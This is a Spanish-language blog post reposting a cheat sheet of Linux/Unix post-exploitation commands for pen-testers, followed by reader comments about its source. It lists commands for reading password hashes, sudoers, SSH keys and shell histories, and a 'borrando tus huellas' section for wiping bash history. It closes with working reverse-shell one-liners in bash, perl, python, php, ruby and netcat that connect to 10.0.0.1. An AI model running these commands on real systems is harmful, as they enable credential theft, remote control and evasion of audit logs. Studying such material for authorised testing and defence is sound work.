Comandos útiles de *nix para pen-testers/hackers

Hoy rescatamos una entrada de c0rrupt en la que se recopilan diversos comandos que nos serán útiles para la post-explotación de un sistema Linux/Unix. Como siempre, si conocéis cualquier otro y queréis compartirlo no dudéis en comentar!

BLIND FILES
/etc/resolv.conf (todos pueden leerlo sin alertar a un IDS)
/etc/motd, /etc/issue
/etc/passwd
SISTEMA
uname -a
ps aux
top -n 1 -b
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version
df -k
mount
last -a
lastlog
lastlogin (*bsd)
getenforce
dmesg
lspci
lsusb
lshw
lshw -c network
free -m
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /
which nmap (ver si está ya instalado)
locate bin/nmap
which nc (ver si está ya instalado)
locate bin/
whoami
jps -l
java -version
RED
hostname -f
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
iptables-save
netstat -anop
netstat -r
netstat -nltupw (root con raw sockets)
arp -a
lsof -nPi
CONFIGURACIONES
ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
cat /etc/issue{,.net}
cat /etc/passwd
cat /etc/shadow (gotta try..)
cat /etc/shadow~ # (suele estar presente si se ha editado con gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lista todos los crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
cat /etc/exports
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers
DETERMINAR DISTRIBUCIÓN:
cat /etc/*release
/etc/SUSE-release                      # Novell SUSE        
/etc/redhat-release, /etc/redhat_version         # Red Hat
/etc/fedora-release                     # Fedora
/etc/slackware-release, /etc/slackware-version     # Slackware
/etc/debian_release, /etc/debian_version,         # Debian
/etc/mandrake-release                 # Mandrake
/etc/sun-release                     # Sun JDS
/etc/release                         # Solaris/Sparc
/etc/gentoo-release                     # Gentoo
/etc/lsb-release                     # ubuntu
??                            # arch linux
arch # on OpenBSD sample: OpenBSD.amd64
uname -a  (often hints at it pretty well)
PAQUETES INSTALADOS
rpm -qa --last | head
yum list | grep installed
dpkg -l  
dpkg -l |grep -i “linux-image”
pkg_info         # FreeBSD
FUENTES, REPOSITORIOS DE SOFTWARE
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat  /etc/yum.conf
ENCONTRAR FICHEROS IMPORTANTES
find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
cd /home/; tree
ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$
locate tgz | grep [.]tgz$
locate sql l grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
locate .properties | grep [.]properties #ficheros de configuración de java
locate .xml | grep [.]xml # ficheros de configuración de java/.net 
find /sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm -4000 # encuentra suids
BORRANDO TUS HUELLAS
export HISTFILE=
rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null
history -c
ACCIONES POR USUARIO
ls -alh /home/*/
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist*
find -type f /home/*/.vnc /home/*/.subversion
grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l
Priv (sudo’d or as root)
ls -alh /root/
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/* | cat /var/spool/cron/*
lsof -nPi
ls /home/*/.ssh/*
SHELL INVERSO
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 10
.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1
Listener-     Xnest :1
Añade permiso para conectar-  xhost +victimIP

3 comentarios :

  1. Un buen listado de comandos útiles en varios sistemas operativos

    http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html

    ResponderEliminar
  2. Debeis citar las fuentes!! Se parece bastante a lo publicado en room363.com jeje :-)

    ResponderEliminar
  3. Cito la fuente al principio del post, concretamente es https://c0rrupt.net/forum/*nix-systems/2180-usefill-cmds-*nix-pen-testers-hackers.html.
    Probablemente hayan sacado información de room363.com, pero no lo especifican.

    También, y a prosito de la entrada, comentar que había un script en python llamado Intersect que automatizaba la tarea. Pero me temo que el proyecto murió :(:

    http://www.hackplayers.com/2012/02/intersect-20-herramienta-de-post.html

    ResponderEliminar